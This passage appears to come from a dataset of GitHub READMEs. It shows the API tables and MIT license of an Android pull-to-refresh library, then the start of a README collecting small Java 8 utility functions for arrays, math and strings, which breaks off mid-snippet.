|setResistance|float|Drag resistance while moving the refresh views (default: `1.65f`)|
|setResistanceOfFooter|float|Drag resistance while moving the Footer view (default: `1.65f`)|
|setResistanceOfHeader|float|Drag resistance while moving the Header view (default: `1.65f`)|
|setRatioToRefresh|float|Refresh trigger position as a ratio of the refresh view height (default: `1.1f`)|
|setRatioOfHeaderToRefresh|float|Refresh trigger position as a ratio of the Header view height (default: `1.1f`)|
|setRatioOfFooterToRefresh|float|Load-more trigger position as a ratio of the Footer view height (default: `1.1f`)|
|setRatioToKeep|float|Position kept while refreshing, as a ratio of the refresh view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|setRatioToKeepHeader|float|Position kept while refreshing, as a ratio of the Header view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|setRatioToKeepFooter|float|Position kept while refreshing, as a ratio of the Footer view height (default: `1f`); only takes effect when the value is less than or equal to the trigger ratio|
|setMaxMoveRatio|float|Maximum movement as a ratio of the refresh view height (default: `0f`, meaning no limit is applied)|
|setMaxMoveRatioOfHeader|float|Maximum movement as a ratio of the Header view height (default: `0f`, meaning no limit is applied)|
|setMaxMoveRatioOfFooter|float|Maximum movement as a ratio of the Footer view height (default: `0f`, meaning no limit is applied)|
|setDurationToClose|int|Duration for collapsing the refresh views back to the start position (default: `350`)|
|setDurationToCloseHeader|int|Duration for collapsing the Header view back to the start position (default: `350`)|
|setDurationToCloseFooter|int|Duration for collapsing the Footer view back to the start position (default: `350`)|
|setDurationOfBackToKeep|int|Duration for rolling back to the kept refresh-view position (default: `200`)|
|setDurationOfBackToKeepHeader|int|Duration for rolling back to the kept Header position (default: `200`)|
|setDurationOfBackToKeepFooter|int|Duration for rolling back to the kept Footer position (default: `200`)|
|setEnablePinContentView|boolean|Pin the content view (default: `false`)|
|setEnablePullToRefresh|boolean|Pull-to-refresh: trigger the refresh as soon as the trigger position is reached while pulling (default: `false`)|
|setEnableOverScroll|boolean|Over-scroll bounce (default: `true`)|
|setEnableInterceptEventWhileLoading|boolean|Intercept and ignore touch events while refreshing (default: `false`)|
|setEnableHeaderDrawerStyle|boolean|Drawer-style Header, i.e. the Header view sits underneath the content view (default: `false`)|
|setEnableFooterDrawerStyle|boolean|Drawer-style Footer, i.e. the Footer view sits underneath the content view (default: `false`)|
|setDisablePerformRefresh|boolean|Disable triggering the Header refresh (default: `false`)|
|setDisablePerformLoadMore|boolean|Disable triggering the Footer refresh (default: `false`)|
|setEnableNoMoreData|boolean|Mark the Footer as having no more data. When set to `true` this is equivalent at the framework level to setting `setDisablePerformLoadMore` to `true`, but custom views can use the flag to change their appearance; `ClassicFooter` supports it out of the box (default: `false`)|
|setEnableNoMoreDataAndNoSpringBack|boolean|Mark the Footer as having no more data and do not spring back|
|setDisableRefresh|boolean|Disable Header refresh (default: `false`)|
|setDisableLoadMore|boolean|Disable Footer refresh (default: `false`)|
|setEnableKeepRefreshView|boolean|Keep the refresh view at its configured keep position while refreshing (default: `true`)|
|setEnableAutoRefresh|boolean|Automatically refresh when scrolled to the top (default: `false`)|
|setEnableAutoLoadMore|boolean|Automatically load more when scrolled to the bottom (default: `false`)|
|setEnablePinRefreshViewWhileLoading|boolean|Pin the refresh view at its keep position and ignore movement, i.e. the Material style (default: `false`); enabling it also enables both `setEnablePinContentView` and `setEnableKeepRefreshView`|
|setSpringInterpolator|Interpolator|Scroll interpolator used when actively expanding|
|setSpringBackInterpolator|Interpolator|Scroll interpolator used when releasing|
|setEnableCompatSyncScroll|boolean|Enable synchronized scrolling while rolling back (default: `true`)|
|setDisableLoadMoreWhenContentNotFull|boolean|Disable load-more when the content view does not fill the screen|
|setStickyHeaderResId|int|Resource ID of the sticky header view|
|setStickyFooterResId|int|Resource ID of the sticky footer view|
|setEnableOldTouchHandling|boolean|Use the legacy touch-event handling logic|
|setScrollTargetView|View|Set the view used to decide whether the edge has been reached. For example, if the SmoothRefreshLayout contains a CoordinatorLayout that in turn contains an AppbarLayout, a RecyclerView, etc., and the view you want moved when loading more is the RecyclerView rather than the CoordinatorLayout, set the RecyclerView as the target view|
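As a quick illustration, the sketch below combines a few of the setters from the table; `refreshLayout` is the instance bound in the earlier Java configuration example, and the chosen values are arbitrary.
```
// Sketch: apply a few of the setters listed above (values are arbitrary)
refreshLayout.setDisableLoadMore(false);       // allow the Footer to trigger load-more
refreshLayout.setEnableAutoLoadMore(true);     // start loading automatically at the bottom
refreshLayout.setEnableKeepRefreshView(true);  // keep the refresh view at its keep position while refreshing
refreshLayout.setRatioOfHeaderToRefresh(1.2f); // require a slightly deeper pull before triggering a refresh
```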
#### SmoothRefreshLayout callbacks
|Name|Parameters|Description|
|:---:|:---:|:---:|
|setOnRefreshListener|T extends OnRefreshListener|Set the refresh event listener|
|addLifecycleObserver|ILifecycleObserver|Add a lifecycle observer|
|addOnStatusChangedListener|OnStatusChangedListener|Add a listener for internal status changes|
|addOnUIPositionChangedListener|OnUIPositionChangedListener|Add a listener for view position changes|
|setOnSyncScrollCallback|OnSyncScrollCallback|Set the callback used for smooth scrolling after the refresh completes|
|setOnPerformAutoLoadMoreCallBack|OnPerformAutoLoadMoreCallBack|Set the condition callback for auto load-more; load-more is triggered immediately when the callback's `canAutoLoadMore()` method returns `true`|
|setOnPerformAutoRefreshCallBack|OnPerformAutoRefreshCallBack|Set the condition callback for auto refresh; refresh is triggered immediately when the callback's `canAutoRefresh()` method returns `true`|
|setOnHeaderEdgeDetectCallBack|OnHeaderEdgeDetectCallBack|Override callback for checking whether the content view is at the top (SmoothRefreshLayout's internal `isNotYetInEdgeCannotMoveHeader()` method)|
|setOnFooterEdgeDetectCallBack|OnFooterEdgeDetectCallBack|Override callback for checking whether the content view is at the bottom (SmoothRefreshLayout's internal `isNotYetInEdgeCannotMoveFooter()` method)|
|setOnHookHeaderRefreshCompleteCallback|OnHookUIRefreshCompleteCallBack|Set a hook callback for Header refresh completion, which can be used to delay completing the refresh|
|setOnHookFooterRefreshCompleteCallback|OnHookUIRefreshCompleteCallBack|Set a hook callback for Footer refresh completion, which can be used to delay completing the refresh|
#### SmoothRefreshLayout other methods
|Name|Parameters|Description|
|:---:|:---:|:---:|
|setDefaultCreator (static method)|IRefreshViewCreator|Set the refresh view creator; when no refresh view has been explicitly specified and the configured mode needs one, the creator is used to build it|
|refreshComplete|none|Finish the refresh and mark the last refresh as successful|
|refreshComplete|boolean|Finish the refresh; parameter: whether the last refresh was successful|
|refreshComplete|boolean,long|Finish the refresh; parameter 1: whether the last refresh was successful, parameter 2: delay before the refresh state is reset (the refresh view's completion callback fires first, but internally the library remains in the refreshing state for the duration of the delay)|
|refreshComplete|long|Finish the refresh and mark the last refresh as successful; parameter: delay before the refresh state is reset (the refresh view's completion callback fires first, but internally the library remains in the refreshing state for the duration of the delay)|
|setLoadingMinTime|long|Set the minimum time between starting and finishing a refresh (default: `500`); parameter: the time difference|
|autoRefresh|none|Automatically trigger a Header refresh: fire the refresh event immediately and scroll to the Header trigger position|
|autoRefresh|boolean|Automatically trigger a Header refresh; parameter: whether to fire the refresh event immediately; scrolls to the Header trigger position|
|autoRefresh|boolean,boolean|Automatically trigger a Header refresh; parameter 1: whether to fire the refresh event immediately, parameter 2: whether to scroll to the Header trigger position|
|forceRefresh|none|Force a Header refresh; this method does not trigger any scrolling|
|autoLoadMore|none|Automatically trigger a Footer refresh: fire the refresh event immediately and scroll to the Footer trigger position|
|autoLoadMore|boolean|Automatically trigger a Footer refresh; parameter: whether to fire the refresh event immediately; scrolls to the Footer trigger position|
|autoLoadMore|boolean,boolean|Automatically trigger a Footer refresh; parameter 1: whether to fire the refresh event immediately, parameter 2: whether to scroll to the Footer trigger position|
|forceLoadMore|none|Force a Footer refresh; this method does not trigger any scrolling|
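A brief sketch of the programmatic triggers above, again reusing the `refreshLayout` instance from the earlier example; the delay value is arbitrary.
```
// Sketch: start a refresh from code and finish it with a delayed state reset
refreshLayout.autoRefresh(true);          // fire the refresh event immediately and scroll to the trigger position
// ... later, once the data has arrived:
refreshLayout.refreshComplete(true, 300); // report success; the refreshing state is kept for another 300ms
```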
#### TwoLevelSmoothRefreshLayout Java setters
|Name|Parameters|Description|
|:---:|:---:|:---:|
|setRatioOfHeaderToHintTwoLevel|float|Position that triggers the two-level refresh hint, as a ratio of the Header view height|
|setRatioOfHeaderToTwoLevel|float|Position that triggers the two-level refresh, as a ratio of the Header view height|
|setRatioToKeepTwoLevelHeader|float|Position kept during a two-level refresh, as a ratio of the Header view height (default: `1f`)|
|setDisableTwoLevelRefresh|boolean|Disable two-level refresh (default: `false`)|
|setDurationOfBackToKeepTwoLevel|int|Duration for rolling back to the kept two-level Header position (default: `500`)|
|setDurationToCloseTwoLevel|int|Duration for rolling back to the start position after the two-level Header finishes refreshing (default: `500`)|
#### TwoLevelSmoothRefreshLayout other methods
|Name|Parameters|Description|
|:---:|:---:|:---:|
|autoTwoLevelRefreshHint|none|Automatically trigger the two-level refresh hint, scroll to the hint position and then roll back to the start position|
|autoTwoLevelRefreshHint|int|Automatically trigger the two-level refresh hint, scroll to the hint position and stay there for the given duration; parameter: how long to stay|
|autoTwoLevelRefreshHint|boolean|Automatically trigger the two-level refresh hint and optionally scroll to the hint position before rolling back to the start position; parameter: whether to scroll to the trigger position|
|autoTwoLevelRefreshHint|boolean,int|Automatically trigger the two-level refresh hint; parameter 1: whether to scroll to the trigger position, parameter 2: how long to stay|
|autoTwoLevelRefreshHint|boolean,int,boolean|Automatically trigger the two-level refresh hint; parameter 1: whether to scroll to the trigger position, parameter 2: how long to stay, parameter 3: whether it can be interrupted by touch, i.e. touch events are intercepted while the hint is playing until the view rolls back to the start position and resets to the default state|
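A short sketch combining the two-level setters and trigger listed above; the layout id and the ratio/duration values are illustrative, not taken from the source.
```
// Sketch: configure and show a two-level refresh hint (id and values are illustrative)
TwoLevelSmoothRefreshLayout refreshLayout =
        (TwoLevelSmoothRefreshLayout) findViewById(R.id.smoothRefreshLayout);
refreshLayout.setRatioOfHeaderToHintTwoLevel(1.5f); // show the hint at 1.5x the Header height
refreshLayout.setRatioOfHeaderToTwoLevel(2.5f);     // commit to the two-level refresh at 2.5x
refreshLayout.autoTwoLevelRefreshHint(true, 500);   // scroll to the hint position and stay there for 500ms
```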
## Thanks
- [liaohuqiu android-Ultra-Pull-To-Refresh](https://github.com/liaohuqiu/android-Ultra-Pull-To-Refresh)
- [pnikosis material-progress](https://github.com/pnikosis/materialish-progress)
## License
MIT License
Copyright (c) 2017 dkzwm
Copyright (c) 2015 liaohuqiu.net
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the ""Software""), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"
shekhargulati/30-seconds-of-java,master,1018,143,2017-12-22T11:09:40Z,159,0,Curated collection of useful little Java functions that you can understand quickly,awesome awesome-list java learn-to-code snippets snippets-collection,"# 30 Seconds Of Java [![Build Status](https://travis-ci.org/shekhargulati/little-java-functions.svg?branch=master)](https://travis-ci.org/shekhargulati/little-java-functions)
> Curated collection of useful little Java 8 functions that you can understand quickly.
## Table of Contents
### Array
* [`chunk`](#chunk)
* [`countOccurrences`](#countoccurrences)
* [`deepFlatten`](#deepflatten)
* [`difference`](#difference)
* [`differenceWith`](#differencewith)
* [`distinctValuesOfArray`](#distinctvaluesofarray)
* [`dropElements`](#dropelements)
* [`dropRight`](#dropright)
* [`everyNth`](#everynth)
* [`filterNonUnique`](#filternonunique)
* [`flatten`](#flatten)
* [`flattenDepth`](#flattendepth)
* [`groupBy`](#groupby)
* [`head`](#head)
* [`initial`](#initial)
* [`initializeArrayWithRange`](#initializearraywithrange)
* [`initializeArrayWithValues`](#initializearraywithvalues)
* [`intersection`](#intersection)
* [`isSorted`](#issorted)
* [`join`](#join)
* [`nthElement`](#nthelement)
* [`pick`](#pick)
* [`reducedFilter`](#reducedfilter)
* [`remove`](#remove)
* [`sample`](#sample)
* [`sampleSize`](#samplesize)
* [`shuffle`](#shuffle)
* [`similarity`](#similarity)
* [`sortedIndex`](#sortedindex)
* [`symmetricDifference`](#symmetricdifference)
* [`tail`](#tail)
* [`take`](#take)
* [`takeRight`](#takeright)
* [`union`](#union)
* [`without`](#without)
* [`zip`](#zip)
* [`zipObject`](#zipobject)
### Math
* [`average`](#average)
* [`gcd`](#gcd)
* [`lcm`](#lcm)
* [`findNextPositivePowerOfTwo`](#findnextpositivepoweroftwo)
* [`isEven`](#iseven)
* [`isPowerOfTwo`](#ispoweroftwo)
* [`generateRandomInt`](#generaterandomint)
### String
* [`anagrams`](#anagrams)
* [`byteSize`](#bytesize)
* [`capitalize`](#capitalize)
* [`capitalizeEveryWord`](#capitalizeeveryword)
* [`countVowels`](#countvowels)
* [`escapeRegExp`](#escaperegexp)
* [`fromCamelCase`](#fromcamelcase)
* [`isAbsoluteURL`](#isabsoluteurl)
* [`isLowerCase`](#islowercase)
* [`isUpperCase`](#isuppercase)
* [`isPalindrome`](#ispalindrome)
* [`isNumeric`](#isnumeric)
* [`mask`](#mask)
* [`reverseString`](#reversestring)
* [`sortCharactersInString`](#sortcharactersinstring)
* [`splitLines`](#splitlines)
* [`toCamelCase`](#tocamelcase)
* [`toKebabCase`](#tokebabcase)
* [`match`](#match)
* [`toSnakeCase`](#tosnakecase)
* [`truncateString`](#truncatestring)
* [`words`](#words)
* [`stringToIntegers`](#stringtointegers)
### IO
* [`convertInputStreamToString`](#convertinputstreamtostring)
* [`readFileAsString`](#readfileasstring)
* [`getCurrentWorkingDirectoryPath`](#getcurrentworkingdirectorypath)
* [`tmpDirName`](#tmpdirname)
### Exception
* [`stackTraceAsString`](#stacktraceasstring)
### System
- [`osName`](#osname)
- [`isDebuggerEnabled`](#isdebuggerenabled)
### Class
- [`getAllInterfaces`](#getallinterfaces)
- [`IsInnerClass`](#isinnerclass)
### Enum
- [`getEnumMap`](#getenummap)
## Array
### chunk
Chunks an array into smaller arrays of specified size.
```java
public static int[][] chunk(int[] numbers, int size) {
return IntStream.iterate(0, i -> i + size)
.limit((long) Math.ceil((double) numbers.length / size))
.mapToObj(cur -> Arrays.copyOfRange(numbers, cur, cur + size > numbers.length ? numbers.length : cur + size))
.toArray(int[][]::new);
}
```
### concat
Concatenates two arrays into a single new array.
```java
public static <T> T[] concat(T[] first, T[] second) {
return Stream.concat(
Stream.of(first),
Stream.of(second)
).toArray(i -> (T[]) Arrays.copyOf(new Object[0], i, first.getClass()));
}
```
### countOccurrences
Counts the occurrences of a value in an array.
Use Arrays.stream().filter().count() to count the total number of values that equal the specified value.
```java
public static long countOccurrences(int[] numbers, int value) {
return Arrays.stream(numbers)
.filter(number -> number == value)
.count();
}
```
### deepFlatten
Deep flattens an array.
Use recursion. Use Arrays.stream().flatMapToInt()
```java
public static int[] deepFlatten(Object[] input) {
return Arrays.stream(input)
.flatMapToInt(o -> {
if (o instanceof Object[]) {
return Arrays.stream(deepFlatten((Object[]) o));
}
return IntStream.of((Integer) o);
}).toArray();
}
```
### difference
Returns the difference between two arrays.
Create a Set from b, then use Arrays.stream().filter() on a to only keep values not contained in b.
```java
public static int[] difference(int[] first, int[] second) {
Set<Integer> set = Arrays.stream(second).boxed().collect(Collectors.toSet());
return Arrays.stream(first)
.filter(v -> !set.contains(v))
.toArray();
}
```
### differenceWith
Filters out all values from an array for which the comparator function does not return true.
The comparator for int is implemented using IntBinaryOperator function.
Uses Arrays.stream().filter and Arrays.stream().noneMatch() to find the appropriate values.
```java
public static int[] differenceWith(int[] first, int[] second, IntBinaryOperator comparator) {
return Arrays.stream(first)
.filter(a ->
Arrays.stream(second)
.noneMatch(b -> comparator.applyAsInt(a, b) == 0)
).toArray();
}
```
### distinctValuesOfArray
Returns all the distinct values of an array.
Uses Arrays.stream().distinct() to discard all duplicated values.
```java
public static int[] distinctValuesOfArray(int[] elements) {
return Arrays.stream(elements).distinct().toArray();
}
```
### dropElements
Removes elements in an array until the passed function returns true. Returns the remaining elements in the array.
Loop through the array, using Arrays.copyOfRange() to drop the first element of the array until the returned value from the function is true. Returns the remaining elements.
```java
public static int[] dropElements(int[] elements, IntPredicate condition) {
while (elements.length > 0 && !condition.test(elements[0])) {
elements = Arrays.copyOfRange(elements, 1, elements.length);
}
return elements;
}
```
### dropRight
Returns a new array with n elements removed from the right.
Check whether n is smaller than the length of the given array and use Arrays.copyOfRange() to slice it accordingly, or return an empty array.
```java
public static int[] dropRight(int[] elements, int n) {
if (n < 0) {
throw new IllegalArgumentException(""n is less than 0"");
}
return n < elements.length
? Arrays.copyOfRange(elements, 0, elements.length - n)
: new int[0];
}
```
### everyNth
Returns every nth element in an array.
Use IntStream.range().filter() to create a new array that contains every nth element of a given array.
```java
public static int[] everyNth(int[] elements, int nth) {
return IntStream.range(0, elements.length)
.filter(i -> i % nth == nth - 1)
.map(i -> elements[i])
.toArray();
}
```
### indexOf
Find index of element in the array. Return -1 in case element does not exist.
Uses IntStream.range().filter() to find index of the element in the array.
```java
public static int indexOf(int[] elements, int el) {
return IntStream.range(0, elements.length)
.filter(idx -> elements[idx] == el)
.findFirst()
.orElse(-1);
}
```
### lastIndexOf
Find last index of element in the array. Return -1 in case element does not exist.
Uses IntStream.iterate().limit().filter() to find index of the element in the array.
```java
public static int lastIndexOf(int[] elements, int el) {
return IntStream.iterate(elements.length - 1, i -> i - 1)
.limit(elements.length)
.filter(idx -> elements[idx] == el)
.findFirst()
.orElse(-1);
}
```
### filterNonUnique
Filters out the non-unique values in an array.
Use Arrays.stream().filter() for an array containing only the unique values.
```java
public static int[] filterNonUnique(int[] elements) {
return Arrays.stream(elements)
.filter(el -> indexOf(elements, el) == lastIndexOf(elements, el))
.toArray();
}
```
### flatten
Flattens an array.
Use Arrays.stream().flatMapToInt().toArray() to create a new array.
```java
public static int[] flatten(Object[] elements) {
return Arrays.stream(elements)
.flatMapToInt(el -> el instanceof int[]
? Arrays.stream((int[]) el)
: IntStream.of((int) el)
).toArray();
}
```
### flattenDepth
Flattens an array up to the specified depth.
```java
public static Object[] flattenDepth(Object[] elements, int depth) {
if (depth == 0) {
return elements;
}
return Arrays.stream(elements)
.flatMap(el -> el instanceof Object[]
? Arrays.stream(flattenDepth((Object[]) el, depth - 1))
: Arrays.stream(new Object[]{el})
).toArray();
}
```
### groupBy
Groups the elements of an array based on the given function.
Uses Arrays.stream().collect(Collectors.groupingBy()) to group based on the grouping function.
```java
public static <T, R> Map<R, List<T>> groupBy(T[] elements, Function<T, R> func) {
return Arrays.stream(elements).collect(Collectors.groupingBy(func));
}
```
### initial
Returns all the elements of an array except the last one.
Use Arrays.copyOfRange() to return all except the last one
```java
public static <T> T[] initial(T[] elements) {
return Arrays.copyOfRange(elements, 0, elements.length - 1);
}
```
### initializeArrayWithRange
Initializes an array containing the numbers in the specified range where start and end are inclusive.
```java
public static int[] initializeArrayWithRange(int end, int start) {
return IntStream.rangeClosed(start, end).toArray();
}
```
### initializeArrayWithValues
Initializes and fills an array with the specified values.
```java
public static int[] initializeArrayWithValues(int n, int value) {
return IntStream.generate(() -> value).limit(n).toArray();
}
```
### intersection
Returns a list of elements that exist in both arrays.
Create a Set from second, then use Arrays.stream().filter() on first to only keep values contained in second.
```java
public static int[] intersection(int[] first, int[] second) {
Set<Integer> set = Arrays.stream(second).boxed().collect(Collectors.toSet());
return Arrays.stream(first)
.filter(set::contains)
.toArray();
}
```
### isSorted
Returns `1` if the array is sorted in ascending order, `-1` if it is sorted in descending order or `0` if it is not sorted.
Calculate the ordering `direction` from the first two elements. Use a for loop to iterate over the array items and compare them in pairs. Return `0` if the `direction` changes, or the `direction` if the last element is reached.
```java
public static <T extends Comparable<? super T>> int isSorted(T[] arr) {
final int direction = arr[0].compareTo(arr[1]) < 0 ? 1 : -1;
for (int i = 0; i < arr.length; i++) {
T val = arr[i];
if (i == arr.length - 1) return direction;
else if ((val.compareTo(arr[i + 1]) * direction > 0)) return 0;
}
return direction;
}
```
### join
Joins all elements of an array into a string and returns this string. Uses a separator and an end separator.
Use IntStream.range to zip index with the array item. Then, use `Stream.reduce` to combine elements into a string.
```java
public static <T> String join(T[] arr, String separator, String end) {
return IntStream.range(0, arr.length)
.mapToObj(i -> new SimpleEntry<>(i, arr[i]))
.reduce("""", (acc, val) -> val.getKey() == arr.length - 2
? acc + val.getValue() + end
: val.getKey() == arr.length - 1 ? acc + val.getValue() : acc + val.getValue() + separator, (fst, snd) -> fst);
}
```
### nthElement
Returns the nth element of an array.
Use `Arrays.copyOfRange()` to get an array containing the nth element at the first place.
```java
public static <T> T nthElement(T[] arr, int n) {
if (n > 0) {
return Arrays.copyOfRange(arr, n, arr.length)[0];
}
return Arrays.copyOfRange(arr, arr.length + n, arr.length)[0];
}
```
### pick
Picks the key-value pairs corresponding to the given keys from an object.
Use `Arrays.stream` to filter all the keys that are present in the `arr`. Then, convert all the keys present into a Map using `Collectors.toMap`.
```java
public static <T, R> Map<T, R> pick(Map<T, R> obj, T[] arr) {
return Arrays.stream(arr)
.filter(obj::containsKey)
.collect(Collectors.toMap(k -> k, obj::get));
}
```
### reducedFilter
Filter an array of objects based on a condition while also filtering out unspecified keys.
Use `Arrays.stream().filter()` to filter the array based on the predicate `fn` so that it returns the objects for which the condition is true. For each filtered Map object, create a new Map with keys present in the `keys`. Finally, collect all the Map object into an array.
```java
public static Map[] reducedFilter(Map[] data, String[] keys, Predicate